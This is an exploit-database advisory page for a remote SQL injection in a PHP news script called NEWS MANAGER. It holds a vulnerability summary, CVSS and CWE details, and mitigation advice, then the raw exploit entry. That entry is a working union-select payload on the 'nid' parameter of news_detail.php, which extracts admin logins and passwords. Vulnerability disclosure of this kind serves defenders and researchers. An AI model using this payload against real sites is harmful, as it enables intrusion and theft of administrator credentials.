header-logo
Suggest Exploit
vendor:
NEWS MANAGER
by:
Hussin X
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: NEWS MANAGER
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

NEWS MANAGER (nid) Remote SQL Injection Vulnerability

The vulnerability allows an attacker to inject SQL queries into the 'nid' parameter of the 'news_detail.php' script. By manipulating the query, an attacker can retrieve sensitive information such as login credentials from the admin table.

Mitigation:

The vendor should sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks. Users should update to the latest version of the software.
Source

Exploit-DB raw data:

#  NEWS MANAGER  (nid) Remote SQL Injection Vulnerability

#    Author: Hussin X
#    Home :  www.iq-ty.com<http://www.iq-ty.com>
#    email:  darkangel_g85[at]Yahoo[DoT]com



#
# Vendor : http://www.preprojects.com/news.asp

Exploit:


server/Script/news_detail.php?nid=-136+union+select+1,2,concat_ws(0x3a,login,password),4,5,6,7+from+admin--


end

  IQ-SecuritY FoRuM

Navigation

Suggest Exploit

Services By CQR